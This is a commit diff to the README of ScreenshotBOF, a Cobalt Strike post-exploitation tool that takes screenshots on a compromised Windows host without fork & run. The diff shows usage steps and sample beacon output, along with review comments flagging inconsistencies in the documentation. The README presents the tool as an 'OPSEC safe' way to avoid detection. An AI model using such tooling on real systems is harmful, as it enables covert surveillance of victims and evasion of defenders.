This commit is contained in:
CodeXTF2 2022-10-26 00:35:38 +08:00
parent 1383db6e7e
commit 7e0ee92cc4
1 changed files with 8 additions and 16 deletions


@ -1,6 +1,6 @@
# ScreenshotBOF # ScreenshotBOF
An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot saved to disk as a file. An alternative screenshot capability for Cobalt Strike that uses WinAPI and does not perform a fork & run. Screenshot downloaded in memory.
## Self Compilation ## Self Compilation
1. git clone the repo 1. git clone the repo
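Review bot: the new one-line description "Screenshot downloaded in memory" is ambiguous about where the bitmap lives. It can be read as in-memory on the beacon side (nothing written on the host) or merely as a Cobalt Strike in-memory download on the operator side. Since the old wording was "saved to disk as a file", the description should state plainly whether a file is still written on the target before the download, for example "Screenshot is returned through the beacon download channel; no file is written on the target", if that is what the code now does.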
@ -9,29 +9,20 @@ An alternative screenshot capability for Cobalt Strike that uses WinAPI and does
## Usage ## Usage
1. import the screenshotBOF.cna script into Cobalt Strike 1. import the screenshotBOF.cna script into Cobalt Strike
2. use the command screenshot_bof 2. use the command screenshot_bof {local filename}
3. Download the screenshot from the target
``` ```
beacon> screenshot_bof beacon> screenshot_bof sad.bmp
[*] Running screenshot BOF by (@codex_tf2) [*] Running screenshot BOF by (@codex_tf2)
[+] host called home, sent: 3411 bytes [+] host called home, sent: 4860 bytes
[+] received output: [+] received output:
[*] Tasked beacon to printscreen and save to disk [*] Tasked beacon to printscreen and save to sad.bmp
[+] received output: [+] received output:
[+] PrintScreen saved to bitmap... [+] PrintScreen saved to bitmap...
[+] received output: [*] started download of sad.bmp
[+] Printscreen bitmap saved to screenshot.bmp
beacon> download screenshot.bmp
[*] Tasked beacon to download screenshot.bmp
[+] host called home, sent: 22 bytes
[*] started download of C:\screenshot.bmp (12441668 bytes)
[*] download of screenshot.bmp is complete
``` ```
## Notes ## Notes
- no evasion is performed, which should be fine since the WinAPIs used are not malicious - no evasion is performed, which should be fine since the WinAPIs used are not malicious
- in memory downloading of screenshots is planned to be added
- the filename can be changed in the source code.
## Why did I make this? ## Why did I make this?
Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more OPSEC safe version of the screenshot capability. Cobalt Strike uses a technique known as fork & run for many of its post-ex capabilities, including the screenshot command. While this behaviour provides stability, it is now well known and heavily monitored for. This BOF is meant to provide a more OPSEC safe version of the screenshot capability.
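Review bot: the sample output still prints "[+] PrintScreen saved to bitmap..." immediately before "[*] started download of sad.bmp", which reads as if a file is written on the host and then downloaded; that contradicts the removed step 3 ("Download the screenshot from the target") and the removed note that the filename can be changed in the source. If the bitmap is only built in memory, reword that message (e.g. "PrintScreen encoded as bitmap in memory") and add a Notes bullet stating that no file is written on the target. The Usage line should also document what `{local filename}` is (from the "save to sad.bmp" line it appears to be the name the download is stored under on the operator side) and whether it is required: `screenshot_bof` with no argument was valid before this change, so the .cna script should handle the missing-argument case rather than task the beacon with an empty name.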
@ -39,3 +30,4 @@ Cobalt Strike uses a technique known as fork & run for many of its post-ex capab
## Credits ## Credits
- Made using https://github.com/securifybv/Visual-Studio-BOF-template - Made using https://github.com/securifybv/Visual-Studio-BOF-template
- Save BMP to file from https://stackoverflow.com/a/60667564 - Save BMP to file from https://stackoverflow.com/a/60667564
- in memory download from https://github.com/anthemtotheego/CredBandit
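Review bot: the credit "Save BMP to file from https://stackoverflow.com/a/60667564" now conflicts with the README's claim that the screenshot is no longer saved to disk. If the file-writing code was removed, drop the entry; if only the BMP header/encoding logic from that answer is still used to build the image in memory, reword it (e.g. "BMP encoding adapted from https://stackoverflow.com/a/60667564") so the credits match what the code does.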